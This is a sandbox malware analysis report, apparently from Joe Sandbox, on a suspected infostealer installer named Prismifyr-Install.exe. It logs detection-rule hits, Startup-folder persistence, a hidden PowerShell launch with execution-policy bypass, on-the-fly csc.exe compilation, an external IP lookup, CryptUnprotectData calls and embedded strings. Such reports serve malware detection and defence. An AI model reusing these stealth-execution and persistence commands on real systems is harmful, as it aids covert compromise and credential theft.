powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", ProcessId: 6456, ProcessName: csc.exe
      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Prismifyr-Install.exe, ProcessId: 1172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Prismifyr-Install.exe", ParentImage: C:\Users\user\Desktop\Prismifyr-Install.exe, ParentProcessId: 1172, ParentProcessName: Prismifyr-Install.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", ProcessId: 5512, ProcessName: cmd.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine|base64offset|contains: z%, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , ProcessId: 2220, ProcessName: csc.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , CommandLine|base64offset|contains: z%, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" , ProcessId: 2220, ProcessName: csc.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3564, TargetFilename: C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6004, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", ProcessId: 3564, ProcessName: powershell.exe

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3564, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", ProcessId: 6456, ProcessName: csc.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFEC6D54AEA CryptUnprotectData,25_2_00007FFEC6D54AEA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFEC6D55069 CryptUnprotectData,25_2_00007FFEC6D55069
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFEC6D64ADA CryptUnprotectData,27_2_00007FFEC6D64ADA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFEC6D65069 CryptUnprotectData,27_2_00007FFEC6D65069
      Source: Prismifyr-Install.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.pdbhP source: powershell.exe, 00000004.00000002.67568805952.0000026AE5A4C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E44CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E44CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.pdb source: powershell.exe, 00000004.00000002.67568805952.0000026AE5A4C000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
      Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
      Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: www.myexternalip.com
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.55.1Accept: */*
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: www.myexternalip.com
      Source: curl.exe, 00000008.00000002.67597964893.00000181039A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
      Source: curl.exe, 00000008.00000002.67597964893.00000181039A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/--ssl-no-revoke
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
      Source: powershell.exe, 00000004.00000002.67585054806.0000026AFCF3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67745105605.00000233F345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000004.00000002.67585054806.0000026AFCF3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67745105605.00000233F345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000004.00000002.67585054806.0000026AFCF3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.verisign.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
      Source: powershell.exe, 00000004.00000002.67582200182.0000026AF4E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67568805952.0000026AE6364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67582200182.0000026AF4FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE4E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
      Source: powershell.exe, 00000004.00000002.67585054806.0000026AFCF3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67745105605.00000233F345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE4E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
      Source: powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/v8/7848
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
      Source: Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
